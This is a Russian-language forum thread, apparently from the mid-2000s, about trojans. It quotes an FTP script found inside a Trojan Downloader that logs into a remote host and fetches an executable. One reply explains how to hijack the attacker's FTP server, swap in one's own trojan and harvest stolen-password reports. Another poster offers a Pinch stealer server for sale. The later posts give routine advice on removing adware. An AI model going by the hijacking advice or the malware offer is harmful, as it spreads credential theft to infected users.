|
Trojan Downloader
Люди! Короче у меня Каспер орёт и пишет что найде Trojan Downloader! Я через каспера нашёл трой и посмотрел из чего он написан!
open [Тут IP затем 30294] user 1 1 get winfifggf.exe quit Что этот троян делает? и как можно обратить такой для свойх целей? |
Да троян это тебе дают его ты его запускаешь и он с указанного сайта перекидывает трой на твою такчку а потом запускает.
|
А вот что он тырит с меня этот троян? 30294 чё эти цыфры ознаяают? и как такойже сделать только в свою пользу?
Почему так распрашиваю потому что конкретно взялся за дело терь только изучаю виры и трояны! поэтому ного вопросов! |
30294 ето пароль на твой компутер! именно его троян и тЫрит!
чтобы "обернуть ето себе на пользу" есть два варианта действий 1 - незамедлительный формат C 2 - прекращаешь страдать х***ей прямо сейчас зы: на заметку юным натуралистам за 10вмз предоставлю для исследований прекрасный екземпляр пинчевского сервака. по вопросам оптовой закупки обращаться в приват =) |
Цитата:
Это троян-Downloader, те в него встроена лишь фунцция закачки чего-нить. Он лезет в интернет по указанному айпи на указанный порт(30294). Судя по синтаксису запроса, это ФТП-сервер. Трой авторизуется под именем юзера "1" и под паролем "1". Затем скачивает к тебе на комп основного тело трояна "winfifggf.exe". Впринципе, он способен тут же его запустить ФТП-командой "!winfifggf.exe"(кажись, так) Либо через реестр после перезагрузки. Как это можно использовать? Можно зайти на этот ФТП-сервак через какой-нить клиент (например, тотал-командер). Если очень повезёт, у тебя будут прова на запись. Тогда делаешь своего троя и заменяешь родного на своего =] Гы.. И забираешь отчеты с паролями со своего мыла. |
Цитата:
USER username PASS password а не USER username password, далее команды GET вообще несуществует, есть RETR и STOR и команды OPEN тоже нет однако, возможно это сценарий для ftp-клиента в Windows (стардартного), но никак не для фтп сервера Цитата:
|
Download. Troyan
Уважаемые форумчанею. Помогите избавиться от всплывающих окон эксплоера. Гуляя по сайтам, мой антивирус предупреждал меня о "Download. Troyan", но несмотря на это я все-равно открывала странички и закачивала необходимые мне файлы. Теперь каждую минуту ко мне лезет реклама, даже если все окна закрыты. Я проверяла компьютер:
Spybot - Search & Destroy Ad-Aware SE Personal Registry Mechanic HijackThis Все они находят проблему, якобы удаляют опасные файлы, но потом оповещают меня о том, что неудалили, т.к. в памяти где то они остались. Ничего не помогает. Я блокировала всплывающие окна, вносила в черный список, удалила все куки, временные файлы и исключения- ничего не помогает. Что мне делать? Адреса всплывающих окон начинаются и заканчиваются на "http://www...................com/normal/yyy102.html" |
Цитата:
Цитата:
|
Почему "проверял"? Я- "она", я проверяла.
Ссылочка не открывается. |
Вот сюда зайди http://stopie.org.ru/links.htm (там только для Firefox) :)
|
Снеси этот IE!! Поставь Opery или FireFox!!!! поставь Каспера, последнее обновление и проверь комп!
|
А что такое "Снеси этот Ie!!"?
Вышеуказанные ссылочки не открываются. |
Насколько я поняла у меня Troyan Look2Me.
Вот скриншот http://img218.imageshack.us/img218/5295/44cx.jpg и эта хрюня не удаляется. Он пишет, что удалил, но при повторной выборке, даже после перезагрузки и формате, опять ее находит... |
И еще добавлюсь: на скриншоте вы увидите 3 ярлычка слева на рабочем столе с сердечком, самолетом и диском- они вскакивают сами по себе... я их тоже не раз уже удаляла... они как блохи по рабочему столу...
|
Ну вот, приехали...
Тут Троянского Коня по запчастям разбирают..., а у меня Ахиллеас где то безнаказанно прячется... |
В общем что бы я зделал, окажись у тебя за компом...
Удалил бы каспер, поставил Nod 32 с новыми базами и проверил бы весь комп на вирусы... Если же какие-то жизненно важные файлы для винды оказались бы заражены и не удалялись, снёс бы винду и установил бы новую. p.s. Каспер, internet explorer - полный ацтой... Вместо ie лучше юзай Mozilla Firefox |
Винда уже и сама слетела. Поставила все с нуля. Проблем больше нет. А Касперского я и сама не уважаю. У меня сейчас Симантек 2006. А был Нортон 2005.
|
Возвращаюсь к теме. Сегодня хотела установить скаченного еDonkey снова тот же троян, но успела на корню с помощью Trojan Remover удалить. Вместе с еDonkey . Первый раз тоже было через него же.
|
Это знаеш чо за тройчик ? это X-control удаленное администратирование у него выходит не плохо...фаервол поставь нормальнвый..касперского выкинь,ставь типа Nod32 и ZoneAlarm новой версии ;)
|
| Время: 04:52 |